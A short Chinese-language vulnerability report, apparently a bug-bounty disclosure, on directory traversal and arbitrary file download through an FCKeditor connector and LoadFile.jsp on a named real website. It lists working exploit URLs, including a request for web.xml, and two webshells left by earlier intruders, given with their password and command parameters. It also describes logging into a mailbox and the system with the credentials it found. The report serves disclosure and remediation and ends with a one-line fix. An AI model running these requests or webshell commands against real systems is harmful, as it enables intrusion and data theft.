目录遍历/文件下载/前人shell,我只是希望能把shell删干净,所以提一下
http://www.4008118228.cn/index.shtml
系统使用了fck编辑器
http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../
http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../Include/
在遍历目录的时候发现一个文件
http://www.4008118228.cn/common/LoadFile.jsp
访问的时候,会把绝对路径爆出来
简单构造就可以下载文件了
http://www.4008118228.cn/common/LoadFile.jsp?FileName=LoadFile.jsp
http://www.4008118228.cn/common/LoadFile.jsp?FileName=../WEB-INF/web.xml
同样的文件在此处还发现一个
http://www.4008118228.cn/Platform/LoadFile.jsp
一并改了吧
shell:
http://www.4008118228.cn/shell.jsp?pwd=023&i=ls /
这里还有一枚遗留,点出来一并删了吧
http://www.4008118228.cn/uddiexplorer/2ss.jsp?pwd=023&i=ls
使用找到的mail登录邮箱
通讯录
最后登录系统
解决方案:
过滤../